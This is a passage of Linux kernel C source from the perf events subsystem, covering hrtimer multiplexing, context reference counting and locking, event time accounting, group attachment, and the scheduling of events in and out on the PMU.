struct task_struct *next)
{
}
static inline void perf_cgroup_sched_in(struct task_struct *prev,
struct task_struct *task)
{
}
static inline int perf_cgroup_connect(pid_t pid, struct perf_event *event,
struct perf_event_attr *attr,
struct perf_event *group_leader)
{
return -EINVAL;
}
static inline void
perf_cgroup_set_timestamp(struct task_struct *task,
struct perf_event_context *ctx)
{
}
void
perf_cgroup_switch(struct task_struct *task, struct task_struct *next)
{
}
static inline void
perf_cgroup_set_shadow_time(struct perf_event *event, u64 now)
{
}
static inline u64 perf_cgroup_event_time(struct perf_event *event)
{
return 0;
}
static inline void
perf_cgroup_defer_enabled(struct perf_event *event)
{
}
static inline void
perf_cgroup_mark_enabled(struct perf_event *event,
struct perf_event_context *ctx)
{
}
static inline void
list_update_cgroup_event(struct perf_event *event,
struct perf_event_context *ctx, bool add)
{
}
#endif
/*
* set default to be dependent on timer tick just
* like original code
*/
#define PERF_CPU_HRTIMER (1000 / HZ)
/*
* function must be called with interrupts disabled
*/
static enum hrtimer_restart perf_mux_hrtimer_handler(struct hrtimer *hr)
{
struct perf_cpu_context *cpuctx;
int rotations = 0;
WARN_ON(!irqs_disabled());
cpuctx = container_of(hr, struct perf_cpu_context, hrtimer);
rotations = perf_rotate_context(cpuctx);
raw_spin_lock(&cpuctx->hrtimer_lock);
if (rotations)
hrtimer_forward_now(hr, cpuctx->hrtimer_interval);
else
cpuctx->hrtimer_active = 0;
raw_spin_unlock(&cpuctx->hrtimer_lock);
return rotations ? HRTIMER_RESTART : HRTIMER_NORESTART;
}
static void __perf_mux_hrtimer_init(struct perf_cpu_context *cpuctx, int cpu)
{
struct hrtimer *timer = &cpuctx->hrtimer;
struct pmu *pmu = cpuctx->ctx.pmu;
u64 interval;
/* no multiplexing needed for SW PMU */
if (pmu->task_ctx_nr == perf_sw_context)
return;
/*
* check that the default is sane; if it is not set,
* force it to the default interval (1/tick)
*/
interval = pmu->hrtimer_interval_ms;
if (interval < 1)
interval = pmu->hrtimer_interval_ms = PERF_CPU_HRTIMER;
cpuctx->hrtimer_interval = ns_to_ktime(NSEC_PER_MSEC * interval);
raw_spin_lock_init(&cpuctx->hrtimer_lock);
hrtimer_init(timer, CLOCK_MONOTONIC, HRTIMER_MODE_ABS_PINNED);
timer->function = perf_mux_hrtimer_handler;
}
static int perf_mux_hrtimer_restart(struct perf_cpu_context *cpuctx)
{
struct hrtimer *timer = &cpuctx->hrtimer;
struct pmu *pmu = cpuctx->ctx.pmu;
unsigned long flags;
/* not for SW PMU */
if (pmu->task_ctx_nr == perf_sw_context)
return 0;
raw_spin_lock_irqsave(&cpuctx->hrtimer_lock, flags);
if (!cpuctx->hrtimer_active) {
cpuctx->hrtimer_active = 1;
hrtimer_forward_now(timer, cpuctx->hrtimer_interval);
hrtimer_start_expires(timer, HRTIMER_MODE_ABS_PINNED);
}
raw_spin_unlock_irqrestore(&cpuctx->hrtimer_lock, flags);
return 0;
}
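/*
 * perf_pmu_disable()/perf_pmu_enable() nest: only the outermost disable and
 * the matching final enable actually touch the PMU.
 */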
void perf_pmu_disable(struct pmu *pmu)
{
int *count = this_cpu_ptr(pmu->pmu_disable_count);
if (!(*count)++)
pmu->pmu_disable(pmu);
}
void perf_pmu_enable(struct pmu *pmu)
{
int *count = this_cpu_ptr(pmu->pmu_disable_count);
if (!--(*count))
pmu->pmu_enable(pmu);
}
static DEFINE_PER_CPU(struct list_head, active_ctx_list);
/*
* perf_event_ctx_activate(), perf_event_ctx_deactivate(), and
* perf_event_task_tick() are fully serialized because they're strictly cpu
* affine and perf_event_ctx{activate,deactivate} are called with IRQs
* disabled, while perf_event_task_tick is called from IRQ context.
*/
static void perf_event_ctx_activate(struct perf_event_context *ctx)
{
struct list_head *head = this_cpu_ptr(&active_ctx_list);
WARN_ON(!irqs_disabled());
WARN_ON(!list_empty(&ctx->active_ctx_list));
list_add(&ctx->active_ctx_list, head);
}
static void perf_event_ctx_deactivate(struct perf_event_context *ctx)
{
WARN_ON(!irqs_disabled());
WARN_ON(list_empty(&ctx->active_ctx_list));
list_del_init(&ctx->active_ctx_list);
}
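/* Take a reference on a context; warn if its refcount had already hit zero. */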
static void get_ctx(struct perf_event_context *ctx)
{
WARN_ON(!atomic_inc_not_zero(&ctx->refcount));
}
static void free_ctx(struct rcu_head *head)
{
struct perf_event_context *ctx;
ctx = container_of(head, struct perf_event_context, rcu_head);
kfree(ctx->task_ctx_data);
kfree(ctx);
}
static void put_ctx(struct perf_event_context *ctx)
{
if (atomic_dec_and_test(&ctx->refcount)) {
if (ctx->parent_ctx)
put_ctx(ctx->parent_ctx);
if (ctx->task && ctx->task != TASK_TOMBSTONE)
put_task_struct(ctx->task);
call_rcu(&ctx->rcu_head, free_ctx);
}
}
/*
* Because of perf_event::ctx migration in sys_perf_event_open::move_group and
* perf_pmu_migrate_context() we need some magic.
*
* Those places that change perf_event::ctx will hold both
* perf_event_ctx::mutex of the 'old' and 'new' ctx value.
*
* Lock ordering is by mutex address. There are two other sites where
* perf_event_context::mutex nests and those are:
*
* - perf_event_exit_task_context() [ child , 0 ]
* perf_event_exit_event()
* put_event() [ parent, 1 ]
*
* - perf_event_init_context() [ parent, 0 ]
* inherit_task_group()
* inherit_group()
* inherit_event()
* perf_event_alloc()
* perf_init_event()
* perf_try_init_event() [ child , 1 ]
*
* While it appears there is an obvious deadlock here -- the parent and child
* nesting levels are inverted between the two -- this is in fact safe because
* life-time rules separate them. That is, an exiting task cannot fork, and a
* spawning task cannot (yet) exit.
*
* But remember that these are parent<->child context relations, and
* migration does not affect children, therefore these two orderings should not
* interact.
*
* The change in perf_event::ctx does not affect children (as claimed above)
* because the sys_perf_event_open() case will install a new event and break
* the ctx parent<->child relation, and perf_pmu_migrate_context() is only
* concerned with cpuctx and that doesn't have children.
*
* The places that change perf_event::ctx will issue:
*
* perf_remove_from_context();
* synchronize_rcu();
* perf_install_in_context();
*
* to effect the change. The remove_from_context() + synchronize_rcu() should
* quiesce the event, after which we can install it in the new location. This
* means that only external vectors (perf_fops, prctl) can perturb the event
* while in transit. Therefore all such accessors should also acquire
* perf_event_context::mutex to serialize against this.
*
* However; because event->ctx can change while we're waiting to acquire
* ctx->mutex we must be careful and use the below perf_event_ctx_lock()
* function.
*
* Lock order:
* cred_guard_mutex
* task_struct::perf_event_mutex
* perf_event_context::mutex
* perf_event::child_mutex;
* perf_event_context::lock
* perf_event::mmap_mutex
* mmap_sem
*/
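/*
 * A minimal usage sketch of the helpers defined below (perf_event_ctx_lock()
 * and perf_event_ctx_unlock(), as used by e.g. perf_event_enable()):
 *
 *	ctx = perf_event_ctx_lock(event);
 *	... event->ctx is now stable; operate on the event ...
 *	perf_event_ctx_unlock(event, ctx);
 */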
static struct perf_event_context *
perf_event_ctx_lock_nested(struct perf_event *event, int nesting)
{
struct perf_event_context *ctx;
again:
rcu_read_lock();
ctx = ACCESS_ONCE(event->ctx);
if (!atomic_inc_not_zero(&ctx->refcount)) {
rcu_read_unlock();
goto again;
}
rcu_read_unlock();
mutex_lock_nested(&ctx->mutex, nesting);
if (event->ctx != ctx) {
mutex_unlock(&ctx->mutex);
put_ctx(ctx);
goto again;
}
return ctx;
}
static inline struct perf_event_context *
perf_event_ctx_lock(struct perf_event *event)
{
return perf_event_ctx_lock_nested(event, 0);
}
static void perf_event_ctx_unlock(struct perf_event *event,
struct perf_event_context *ctx)
{
mutex_unlock(&ctx->mutex);
put_ctx(ctx);
}
/*
* This must be done under ctx->lock, so as to serialize against
* context_equiv(); therefore we cannot call put_ctx(), since that might end up
* taking scheduler-related locks, and ctx->lock nests inside those.
*/
static __must_check struct perf_event_context *
unclone_ctx(struct perf_event_context *ctx)
{
struct perf_event_context *parent_ctx = ctx->parent_ctx;
lockdep_assert_held(&ctx->lock);
if (parent_ctx)
ctx->parent_ctx = NULL;
ctx->generation++;
return parent_ctx;
}
static u32 perf_event_pid(struct perf_event *event, struct task_struct *p)
{
/*
* only top level events have the pid namespace they were created in
*/
if (event->parent)
event = event->parent;
return task_tgid_nr_ns(p, event->ns);
}
static u32 perf_event_tid(struct perf_event *event, struct task_struct *p)
{
/*
* only top level events have the pid namespace they were created in
*/
if (event->parent)
event = event->parent;
return task_pid_nr_ns(p, event->ns);
}
/*
* If we inherit events we want to return the parent event id
* to userspace.
*/
static u64 primary_event_id(struct perf_event *event)
{
u64 id = event->id;
if (event->parent)
id = event->parent->id;
return id;
}
/*
* Get the perf_event_context for a task and lock it.
*
* This has to cope with the fact that until it is locked,
* the context could get moved to another task.
*/
static struct perf_event_context *
perf_lock_task_context(struct task_struct *task, int ctxn, unsigned long *flags)
{
struct perf_event_context *ctx;
retry:
/*
* One of the few rules of preemptible RCU is that one cannot do
* rcu_read_unlock() while holding a scheduler (or nested) lock when
* part of the read side critical section was irqs-enabled -- see
* rcu_read_unlock_special().
*
* Since ctx->lock nests under rq->lock we must ensure the entire read
* side critical section has interrupts disabled.
*/
local_irq_save(*flags);
rcu_read_lock();
ctx = rcu_dereference(task->perf_event_ctxp[ctxn]);
if (ctx) {
/*
* If this context is a clone of another, it might
* get swapped for another underneath us by
* perf_event_task_sched_out, though the
* rcu_read_lock() protects us from any context
* getting freed. Lock the context and check if it
* got swapped before we could get the lock, and retry
* if so. If we locked the right context, then it
* can't get swapped on us any more.
*/
raw_spin_lock(&ctx->lock);
if (ctx != rcu_dereference(task->perf_event_ctxp[ctxn])) {
raw_spin_unlock(&ctx->lock);
rcu_read_unlock();
local_irq_restore(*flags);
goto retry;
}
if (ctx->task == TASK_TOMBSTONE ||
!atomic_inc_not_zero(&ctx->refcount)) {
raw_spin_unlock(&ctx->lock);
ctx = NULL;
} else {
WARN_ON_ONCE(ctx->task != task);
}
}
rcu_read_unlock();
if (!ctx)
local_irq_restore(*flags);
return ctx;
}
/*
* Get the context for a task and increment its pin_count so it
* can't get swapped to another task. This also increments its
* reference count so that the context can't get freed.
*/
static struct perf_event_context *
perf_pin_task_context(struct task_struct *task, int ctxn)
{
struct perf_event_context *ctx;
unsigned long flags;
ctx = perf_lock_task_context(task, ctxn, &flags);
if (ctx) {
++ctx->pin_count;
raw_spin_unlock_irqrestore(&ctx->lock, flags);
}
return ctx;
}
static void perf_unpin_context(struct perf_event_context *ctx)
{
unsigned long flags;
raw_spin_lock_irqsave(&ctx->lock, flags);
--ctx->pin_count;
raw_spin_unlock_irqrestore(&ctx->lock, flags);
}
/*
* Update the record of the current time in a context.
*/
static void update_context_time(struct perf_event_context *ctx)
{
u64 now = perf_clock();
ctx->time += now - ctx->timestamp;
ctx->timestamp = now;
}
static u64 perf_event_time(struct perf_event *event)
{
struct perf_event_context *ctx = event->ctx;
if (is_cgroup_event(event))
return perf_cgroup_event_time(event);
return ctx ? ctx->time : 0;
}
/*
* Update the total_time_enabled and total_time_running fields for an event.
*/
static void update_event_times(struct perf_event *event)
{
struct perf_event_context *ctx = event->ctx;
u64 run_end;
lockdep_assert_held(&ctx->lock);
if (event->state < PERF_EVENT_STATE_INACTIVE ||
event->group_leader->state < PERF_EVENT_STATE_INACTIVE)
return;
/*
* in cgroup mode, time_enabled represents
* the time the event was enabled AND active
* tasks were in the monitored cgroup. This is
* independent of the activity of the context as
* there may be a mix of cgroup and non-cgroup events.
*
* That is why we treat cgroup events differently
* here.
*/
if (is_cgroup_event(event))
run_end = perf_cgroup_event_time(event);
else if (ctx->is_active)
run_end = ctx->time;
else
run_end = event->tstamp_stopped;
event->total_time_enabled = run_end - event->tstamp_enabled;
if (event->state == PERF_EVENT_STATE_INACTIVE)
run_end = event->tstamp_stopped;
else
run_end = perf_event_time(event);
event->total_time_running = run_end - event->tstamp_running;
}
/*
* Update total_time_enabled and total_time_running for all events in a group.
*/
static void update_group_times(struct perf_event *leader)
{
struct perf_event *event;
update_event_times(leader);
list_for_each_entry(event, &leader->sibling_list, group_entry)
update_event_times(event);
}
static enum event_type_t get_event_type(struct perf_event *event)
{
struct perf_event_context *ctx = event->ctx;
enum event_type_t event_type;
lockdep_assert_held(&ctx->lock);
event_type = event->attr.pinned ? EVENT_PINNED : EVENT_FLEXIBLE;
if (!ctx->task)
event_type |= EVENT_CPU;
return event_type;
}
static struct list_head *
ctx_group_list(struct perf_event *event, struct perf_event_context *ctx)
{
if (event->attr.pinned)
return &ctx->pinned_groups;
else
return &ctx->flexible_groups;
}
/*
* Add an event to the lists for its context.
* Must be called with ctx->mutex and ctx->lock held.
*/
static void
list_add_event(struct perf_event *event, struct perf_event_context *ctx)
{
lockdep_assert_held(&ctx->lock);
WARN_ON_ONCE(event->attach_state & PERF_ATTACH_CONTEXT);
event->attach_state |= PERF_ATTACH_CONTEXT;
/*
* If we're a standalone event or group leader, we go to the context
* list; group events are kept attached to the group so that
* perf_group_detach can, at all times, locate all siblings.
*/
if (event->group_leader == event) {
struct list_head *list;
event->group_caps = event->event_caps;
list = ctx_group_list(event, ctx);
list_add_tail(&event->group_entry, list);
}
list_update_cgroup_event(event, ctx, true);
list_add_rcu(&event->event_entry, &ctx->event_list);
ctx->nr_events++;
if (event->attr.inherit_stat)
ctx->nr_stat++;
ctx->generation++;
}
/*
* Initialize event state based on the perf_event_attr::disabled.
*/
static inline void perf_event__state_init(struct perf_event *event)
{
event->state = event->attr.disabled ? PERF_EVENT_STATE_OFF :
PERF_EVENT_STATE_INACTIVE;
}
static void __perf_event_read_size(struct perf_event *event, int nr_siblings)
{
int entry = sizeof(u64); /* value */
int size = 0;
int nr = 1;
if (event->attr.read_format & PERF_FORMAT_TOTAL_TIME_ENABLED)
size += sizeof(u64);
if (event->attr.read_format & PERF_FORMAT_TOTAL_TIME_RUNNING)
size += sizeof(u64);
if (event->attr.read_format & PERF_FORMAT_ID)
entry += sizeof(u64);
if (event->attr.read_format & PERF_FORMAT_GROUP) {
nr += nr_siblings;
size += sizeof(u64);
}
size += entry * nr;
event->read_size = size;
}
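/*
 * A hypothetical example of the sizing above: with read_format set to
 * PERF_FORMAT_GROUP | PERF_FORMAT_ID and nr_siblings == 2, each entry is
 * 16 bytes (value + id), nr becomes 3 (leader plus two siblings) and the
 * group header adds 8 bytes, so read_size = 8 + 3 * 16 = 56 bytes.
 */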
static void __perf_event_header_size(struct perf_event *event, u64 sample_type)
{
struct perf_sample_data *data;
u16 size = 0;
if (sample_type & PERF_SAMPLE_IP)
size += sizeof(data->ip);
if (sample_type & PERF_SAMPLE_ADDR)
size += sizeof(data->addr);
if (sample_type & PERF_SAMPLE_PERIOD)
size += sizeof(data->period);
if (sample_type & PERF_SAMPLE_WEIGHT)
size += sizeof(data->weight);
if (sample_type & PERF_SAMPLE_READ)
size += event->read_size;
if (sample_type & PERF_SAMPLE_DATA_SRC)
size += sizeof(data->data_src.val);
if (sample_type & PERF_SAMPLE_TRANSACTION)
size += sizeof(data->txn);
event->header_size = size;
}
/*
* Called at perf_event creation and when events are attached/detached from a
* group.
*/
static void perf_event__header_size(struct perf_event *event)
{
__perf_event_read_size(event,
event->group_leader->nr_siblings);
__perf_event_header_size(event, event->attr.sample_type);
}
static void perf_event__id_header_size(struct perf_event *event)
{
struct perf_sample_data *data;
u64 sample_type = event->attr.sample_type;
u16 size = 0;
if (sample_type & PERF_SAMPLE_TID)
size += sizeof(data->tid_entry);
if (sample_type & PERF_SAMPLE_TIME)
size += sizeof(data->time);
if (sample_type & PERF_SAMPLE_IDENTIFIER)
size += sizeof(data->id);
if (sample_type & PERF_SAMPLE_ID)
size += sizeof(data->id);
if (sample_type & PERF_SAMPLE_STREAM_ID)
size += sizeof(data->stream_id);
if (sample_type & PERF_SAMPLE_CPU)
size += sizeof(data->cpu_entry);
event->id_header_size = size;
}
static bool perf_event_validate_size(struct perf_event *event)
{
/*
* The values computed here will be overwritten when we actually
* attach the event.
*/
__perf_event_read_size(event, event->group_leader->nr_siblings + 1);
__perf_event_header_size(event, event->attr.sample_type & ~PERF_SAMPLE_READ);
perf_event__id_header_size(event);
/*
* Sum the lot; should not exceed the 64k limit we have on records.
* Conservative limit to allow for callchains and other variable fields.
*/
if (event->read_size + event->header_size +
event->id_header_size + sizeof(struct perf_event_header) >= 16*1024)
return false;
return true;
}
static void perf_group_attach(struct perf_event *event)
{
struct perf_event *group_leader = event->group_leader, *pos;
lockdep_assert_held(&event->ctx->lock);
/*
* We can have double attach due to group movement in perf_event_open.
*/
if (event->attach_state & PERF_ATTACH_GROUP)
return;
event->attach_state |= PERF_ATTACH_GROUP;
if (group_leader == event)
return;
WARN_ON_ONCE(group_leader->ctx != event->ctx);
group_leader->group_caps &= event->event_caps;
list_add_tail(&event->group_entry, &group_leader->sibling_list);
group_leader->nr_siblings++;
perf_event__header_size(group_leader);
list_for_each_entry(pos, &group_leader->sibling_list, group_entry)
perf_event__header_size(pos);
}
/*
* Remove an event from the lists for its context.
* Must be called with ctx->mutex and ctx->lock held.
*/
static void
list_del_event(struct perf_event *event, struct perf_event_context *ctx)
{
WARN_ON_ONCE(event->ctx != ctx);
lockdep_assert_held(&ctx->lock);
/*
* We can have double detach due to exit/hot-unplug + close.
*/
if (!(event->attach_state & PERF_ATTACH_CONTEXT))
return;
event->attach_state &= ~PERF_ATTACH_CONTEXT;
list_update_cgroup_event(event, ctx, false);
ctx->nr_events--;
if (event->attr.inherit_stat)
ctx->nr_stat--;
list_del_rcu(&event->event_entry);
if (event->group_leader == event)
list_del_init(&event->group_entry);
update_group_times(event);
/*
* If the event was in error state, then keep it
* that way; otherwise bogus counts will be
* returned on read(). The only way to get out
* of error state is by explicitly re-enabling
* the event.
*/
if (event->state > PERF_EVENT_STATE_OFF)
event->state = PERF_EVENT_STATE_OFF;
ctx->generation++;
}
static void perf_group_detach(struct perf_event *event)
{
struct perf_event *sibling, *tmp;
struct list_head *list = NULL;
lockdep_assert_held(&event->ctx->lock);
/*
* We can have double detach due to exit/hot-unplug + close.
*/
if (!(event->attach_state & PERF_ATTACH_GROUP))
return;
event->attach_state &= ~PERF_ATTACH_GROUP;
/*
* If this is a sibling, remove it from its group.
*/
if (event->group_leader != event) {
list_del_init(&event->group_entry);
event->group_leader->nr_siblings--;
goto out;
}
if (!list_empty(&event->group_entry))
list = &event->group_entry;
/*
* If this was a group event with sibling events then
* upgrade the siblings to singleton events by adding them
* to whatever list we are on.
*/
list_for_each_entry_safe(sibling, tmp, &event->sibling_list, group_entry) {
if (list)
list_move_tail(&sibling->group_entry, list);
sibling->group_leader = sibling;
/* Inherit group flags from the previous leader */
sibling->group_caps = event->group_caps;
WARN_ON_ONCE(sibling->ctx != event->ctx);
}
out:
perf_event__header_size(event->group_leader);
list_for_each_entry(tmp, &event->group_leader->sibling_list, group_entry)
perf_event__header_size(tmp);
}
static bool is_orphaned_event(struct perf_event *event)
{
return event->state == PERF_EVENT_STATE_DEAD;
}
static inline int __pmu_filter_match(struct perf_event *event)
{
struct pmu *pmu = event->pmu;
return pmu->filter_match ? pmu->filter_match(event) : 1;
}
/*
* Check whether we should attempt to schedule an event group based on
* PMU-specific filtering. An event group can consist of HW and SW events,
* potentially with a SW leader, so we must check all the filters, to
* determine whether a group is schedulable:
*/
static inline int pmu_filter_match(struct perf_event *event)
{
struct perf_event *child;
if (!__pmu_filter_match(event))
return 0;
list_for_each_entry(child, &event->sibling_list, group_entry) {
if (!__pmu_filter_match(child))
return 0;
}
return 1;
}
static inline int
event_filter_match(struct perf_event *event)
{
return (event->cpu == -1 || event->cpu == smp_processor_id()) &&
perf_cgroup_match(event) && pmu_filter_match(event);
}
static void
event_sched_out(struct perf_event *event,
struct perf_cpu_context *cpuctx,
struct perf_event_context *ctx)
{
u64 tstamp = perf_event_time(event);
u64 delta;
WARN_ON_ONCE(event->ctx != ctx);
lockdep_assert_held(&ctx->lock);
/*
* An event which could not be activated because of
* filter mismatch still needs to have its timings
* maintained, otherwise bogus information is returned
* via read() for time_enabled, time_running:
*/
if (event->state == PERF_EVENT_STATE_INACTIVE &&
!event_filter_match(event)) {
delta = tstamp - event->tstamp_stopped;
event->tstamp_running += delta;
event->tstamp_stopped = tstamp;
}
if (event->state != PERF_EVENT_STATE_ACTIVE)
return;
perf_pmu_disable(event->pmu);
event->tstamp_stopped = tstamp;
event->pmu->del(event, 0);
event->oncpu = -1;
event->state = PERF_EVENT_STATE_INACTIVE;
if (event->pending_disable) {
event->pending_disable = 0;
event->state = PERF_EVENT_STATE_OFF;
}
if (!is_software_event(event))
cpuctx->active_oncpu--;
if (!--ctx->nr_active)
perf_event_ctx_deactivate(ctx);
if (event->attr.freq && event->attr.sample_freq)
ctx->nr_freq--;
if (event->attr.exclusive || !cpuctx->active_oncpu)
cpuctx->exclusive = 0;
perf_pmu_enable(event->pmu);
}
static void
group_sched_out(struct perf_event *group_event,
struct perf_cpu_context *cpuctx,
struct perf_event_context *ctx)
{
struct perf_event *event;
int state = group_event->state;
perf_pmu_disable(ctx->pmu);
event_sched_out(group_event, cpuctx, ctx);
/*
* Schedule out siblings (if any):
*/
list_for_each_entry(event, &group_event->sibling_list, group_entry)
event_sched_out(event, cpuctx, ctx);
perf_pmu_enable(ctx->pmu);
if (state == PERF_EVENT_STATE_ACTIVE && group_event->attr.exclusive)
cpuctx->exclusive = 0;
}
#define DETACH_GROUP 0x01UL
/*
* Cross CPU call to remove a performance event
*
* We disable the event on the hardware level first. After that we
* remove it from the context list.
*/
static void
__perf_remove_from_context(struct perf_event *event,
struct perf_cpu_context *cpuctx,
struct perf_event_context *ctx,
void *info)
{
unsigned long flags = (unsigned long)info;
event_sched_out(event, cpuctx, ctx);
if (flags & DETACH_GROUP)
perf_group_detach(event);
list_del_event(event, ctx);
if (!ctx->nr_events && ctx->is_active) {
ctx->is_active = 0;
if (ctx->task) {
WARN_ON_ONCE(cpuctx->task_ctx != ctx);
cpuctx->task_ctx = NULL;
}
}
}
/*
* Remove the event from a task's (or a CPU's) list of events.
*
* If event->ctx is a cloned context, callers must make sure that
* every task struct that event->ctx->task could possibly point to
* remains valid. This is OK when called from perf_release since
* that only calls us on the top-level context, which can't be a clone.
* When called from perf_event_exit_task, it's OK because the
* context has been detached from its task.
*/
static void perf_remove_from_context(struct perf_event *event, unsigned long flags)
{
struct perf_event_context *ctx = event->ctx;
lockdep_assert_held(&ctx->mutex);
event_function_call(event, __perf_remove_from_context, (void *)flags);
/*
* The above event_function_call() can NO-OP when it hits
* TASK_TOMBSTONE. In that case we must already have been detached
* from the context (by perf_event_exit_event()) but the grouping
* might still be intact.
*/
WARN_ON_ONCE(event->attach_state & PERF_ATTACH_CONTEXT);
if ((flags & DETACH_GROUP) &&
(event->attach_state & PERF_ATTACH_GROUP)) {
/*
* Since in that case we cannot possibly be scheduled, simply
* detach now.
*/
raw_spin_lock_irq(&ctx->lock);
perf_group_detach(event);
raw_spin_unlock_irq(&ctx->lock);
}
}
/*
* Cross CPU call to disable a performance event
*/
static void __perf_event_disable(struct perf_event *event,
struct perf_cpu_context *cpuctx,
struct perf_event_context *ctx,
void *info)
{
if (event->state < PERF_EVENT_STATE_INACTIVE)
return;
update_context_time(ctx);
update_cgrp_time_from_event(event);
update_group_times(event);
if (event == event->group_leader)
group_sched_out(event, cpuctx, ctx);
else
event_sched_out(event, cpuctx, ctx);
event->state = PERF_EVENT_STATE_OFF;
}
/*
* Disable an event.
*
* If event->ctx is a cloned context, callers must make sure that
* every task struct that event->ctx->task could possibly point to
* remains valid. This condition is satisfied when called through
* perf_event_for_each_child or perf_event_for_each because they
* hold the top-level event's child_mutex, so any descendant that
* goes to exit will block in perf_event_exit_event().
*
* When called from perf_pending_event it's OK because event->ctx
* is the current context on this CPU and preemption is disabled,
* hence we can't get into perf_event_task_sched_out for this context.
*/
static void _perf_event_disable(struct perf_event *event)
{
struct perf_event_context *ctx = event->ctx;
raw_spin_lock_irq(&ctx->lock);
if (event->state <= PERF_EVENT_STATE_OFF) {
raw_spin_unlock_irq(&ctx->lock);
return;
}
raw_spin_unlock_irq(&ctx->lock);
event_function_call(event, __perf_event_disable, NULL);
}
void perf_event_disable_local(struct perf_event *event)
{
event_function_local(event, __perf_event_disable, NULL);
}
/*
* Strictly speaking kernel users cannot create groups and therefore this
* interface does not need the perf_event_ctx_lock() magic.
*/
void perf_event_disable(struct perf_event *event)
{
struct perf_event_context *ctx;
ctx = perf_event_ctx_lock(event);
_perf_event_disable(event);
perf_event_ctx_unlock(event, ctx);
}
EXPORT_SYMBOL_GPL(perf_event_disable);
void perf_event_disable_inatomic(struct perf_event *event)
{
event->pending_disable = 1;
irq_work_queue(&event->pending);
}
static void perf_set_shadow_time(struct perf_event *event,
struct perf_event_context *ctx,
u64 tstamp)
{
/*
* use the correct time source for the time snapshot
*
* We could get by without this by leveraging the
* fact that to get to this function, the caller
* has most likely already called update_context_time()
* and update_cgrp_time_xx() and thus both timestamp
* are identical (or very close). Given that tstamp is
* already adjusted for cgroup, we could say that:
* tstamp - ctx->timestamp
* is equivalent to
* tstamp - cgrp->timestamp.
*
* Then, in perf_output_read(), the calculation would
* work with no changes because:
* - event is guaranteed scheduled in
* - no scheduled out in between
* - thus the timestamp would be the same
*
* But this is a bit hairy.
*
* So instead, we have an explicit cgroup call to remain
* within the time source all along. We believe it
* is cleaner and simpler to understand.
*/
if (is_cgroup_event(event))
perf_cgroup_set_shadow_time(event, tstamp);
else
event->shadow_ctx_time = tstamp - ctx->timestamp;
}
#define MAX_INTERRUPTS (~0ULL)
static void perf_log_throttle(struct perf_event *event, int enable);
static void perf_log_itrace_start(struct perf_event *event);
static int
event_sched_in(struct perf_event *event,
struct perf_cpu_context *cpuctx,
struct perf_event_context *ctx)
{
u64 tstamp = perf_event_time(event);
int ret = 0;
lockdep_assert_held(&ctx->lock);
if (event->state <= PERF_EVENT_STATE_OFF)
return 0;
WRITE_ONCE(event->oncpu, smp_processor_id());
/*
* Order event::oncpu write to happen before the ACTIVE state
* is visible.
*/
smp_wmb();
WRITE_ONCE(event->state, PERF_EVENT_STATE_ACTIVE);
/*
* Unthrottle events: since we were just scheduled in, we might have missed
* several ticks already, and for a heavily scheduling task there is little
* guarantee it'll get a tick in a timely manner.
*/
if (unlikely(event->hw.interrupts == MAX_INTERRUPTS)) {
perf_log_throttle(event, 1);
event->hw.interrupts = 0;
}
/*
* The new state must be visible before we turn it on in the hardware:
*/
smp_wmb();
perf_pmu_disable(event->pmu);
perf_set_shadow_time(event, ctx, tstamp);
perf_log_itrace_start(event);
if (event->pmu->add(event, PERF_EF_START)) {
event->state = PERF_EVENT_STATE_INACTIVE;
event->oncpu = -1;
ret = -EAGAIN;
goto out;
}
event->tstamp_running += tstamp - event->tstamp_stopped;
if (!is_software_event(event))
cpuctx->active_oncpu++;
if (!ctx->nr_active++)
perf_event_ctx_activate(ctx);
if (event->attr.freq && event->attr.sample_freq)
ctx->nr_freq++;
if (event->attr.exclusive)
cpuctx->exclusive = 1;
out:
perf_pmu_enable(event->pmu);
return ret;
}
static int
group_sched_in(struct perf_event *group_event,
struct perf_cpu_context *cpuctx,
struct perf_event_context *ctx)
{
struct perf_event *event, *partial_group = NULL;
struct pmu *pmu = ctx->pmu;
u64 now = ctx->time;
bool simulate = false;
if (group_event->state == PERF_EVENT_STATE_OFF)
return 0;
pmu->start_txn(pmu, PERF_PMU_TXN_ADD);
if (event_sched_in(group_event, cpuctx, ctx)) {
pmu->cancel_txn(pmu);
perf_mux_hrtimer_restart(cpuctx);
return -EAGAIN;
}
/*
* Schedule in siblings as one group (if any):
*/
list_for_each_entry(event, &group_event->sibling_list, group_entry) {
if (event_sched_in(event, cpuctx, ctx)) {
partial_group = event;
goto group_error;
}
}
if (!pmu->commit_txn(pmu))
return 0;
group_error:
/*
* Groups can be scheduled in as one unit only, so undo any
* partial group before returning:
* The events up to the failed event are scheduled out normally,
* tstamp_stopped will be updated.
*
* The failed events and the remaining siblings need to have
* their timings updated as if they had gone through event_sched_in()
* and event_sched_out(). This is required to get consistent timings
* across the group. This also takes care of the case where the group
* could never be scheduled by ensuring tstamp_stopped is set to mark
* the time the event was actually stopped, such that time delta
* calculation in update_event_times() is correct.
*/
list_for_each_entry(event, &group_event->sibling_list, group_entry) {
if (event == partial_group)
simulate = true;
if (simulate) {
event->tstamp_running += now - event->tstamp_stopped;
event->tstamp_stopped = now;
} else {
event_sched_out(event, cpuctx, ctx);
}
}
event_sched_out(group_event, cpuctx, ctx);
pmu->cancel_txn(pmu);
perf_mux_hrtimer_restart(cpuctx);
return -EAGAIN;
}
/*
* Work out whether we can put this event group on the CPU now.
*/
static int group_can_go_on(struct perf_event *event,
struct perf_cpu_context *cpuctx,
int can_add_hw)
{
/*
* Groups consisting entirely of software events can always go on.
*/
if (event->group_caps & PERF_EV_CAP_SOFTWARE)
return 1;
/*
* If an exclusive group is already on, no other hardware
* events can go on.
*/
if (cpuctx->exclusive)
return 0;
/*
* If this group is exclusive and there are already
* events on the CPU, it can't go on.
*/
if (event->attr.exclusive && cpuctx->active_oncpu)
return 0;
/*
* Otherwise, try to add it if all previous groups were able
* to go on.
*/
return can_add_hw;
}
static void add_event_to_ctx(struct perf_event *event,
struct perf_event_context *ctx)
{
u64 tstamp = perf_event_time(event);
list_add_event(event, ctx);
perf_group_attach(event);
event->tstamp_enabled = tstamp;
event->tstamp_running = tstamp;
event->tstamp_stopped = tstamp;
}
static void ctx_sched_out(struct perf_event_context *ctx,
struct perf_cpu_context *cpuctx,
enum event_type_t event_type);
static void
ctx_sched_in(struct perf_event_context *ctx,
struct perf_cpu_context *cpuctx,
enum event_type_t event_type,
struct task_struct *task);
static void task_ctx_sched_out(struct perf_cpu_context *cpuctx,
struct perf_event_context *ctx,
enum event_type_t event_type)
{
if (!cpuctx->task_ctx)
return;
if (WARN_ON_ONCE(ctx != cpuctx->task_ctx))
return;
ctx_sched_out(ctx, cpuctx, event_type);
}
